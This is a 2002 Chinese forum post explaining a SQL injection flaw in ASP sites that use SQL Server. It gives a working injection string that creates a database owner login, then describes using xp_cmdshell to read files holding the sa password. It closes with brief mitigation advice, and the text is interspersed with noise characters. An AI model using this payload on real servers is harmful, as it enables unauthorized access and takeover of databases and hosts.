找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 7266|回复: 0

ASP程序+数据库安全一例

[复制链接]
发表于 2002-2-10 17:14:05 | 显示全部楼层 |阅读模式
为了考证这种类型的程序BUG,笔者最近去了很多用ASP和SQL SERVER做的网站,发现绝大部分网站的程序有这个BUG,于是觉得有必要把这个问题贴出,以免大家犯同样的错误。
+ N2 d5 x8 m/ V9 t; n  BUG描述:
0 ^( V! z. w! G" \& z7 z) w  把一个有参数的xxx.asp?x=x程序变成xxx.asp?x=x;use pubs;exec sp_addlogin 'admin','admin','master';exec sp_adduser 'admin','admin','db_ower';--
- S6 j* I8 @  W) ?4 E7 @/ O2 k  BUG讲解:' c) j* p8 C$ _
  这个BUG是利用参数未过滤来执行SQL语句增加一个用户,然后可以用此用户连上SQL SERVER,再通过exec xp_cmdshell 'type x.asp'来查看存有sa密码的ASP文件来获得SQL SERVER的最高权限。
8 F: M* R" ~% `8 J- I! f6 k& o  BUG消除:
& l; y. {5 [1 n* S1 X5 K" }  程序增加参数过滤& Q) l- h6 L) j
  附:sp_addlogin和sp_adduser语法
8 F4 o% g! T5 g+ P& y. j& Fsp_addlogin [@loginame =] 'login'
& i* |+ E& o  t: R# W# N  [,][@passwd =] 'password']
5 B8 h  Q+ O7 `* H  [,][@defdb =] 'database']% S% c  y- R: `, F) r
  [,][@deflanguage =] 'language']" }8 Y! p8 k+ |
  [,[@sid =] 'sid']9 v& a" ^' c: ^+ y: }) v+ ?7 N
  [,][@encryptopt =] 'encryption_option']
$ r  F! a1 |0 v4 |% c* Esp_adduser [@loginame =] 'login'
. z/ {% }: b/ q- M  [,][@name_in_db =] 'user']. G$ s' z! a; t0 N
  [,][@grpname =] 'group']  |$ ?% Y  @3 M4 x& k5 i6 ]# i
  注:如果采取SQL SERVER设为本地连接、改变端品号、drop xp_cmdshell等等可以防止很多攻击行为呀 ^_^
$ O2 I& C& Q' x( o. B9 Q嘿嘿,这个BUG还可以用来改administrator的密码,让服务器关机等等
6 n4 K$ Z% ^# Q! r. `$ H/ l) U
*滑块验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

Archiver|小黑屋|宽带技术网 |网站地图 粤公网安备44152102000001号

GMT+8, 2026-2-1 19:20 , Processed in 0.018038 second(s), 4 queries , Redis On.

Powered by Discuz! X3.5 Licensed

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表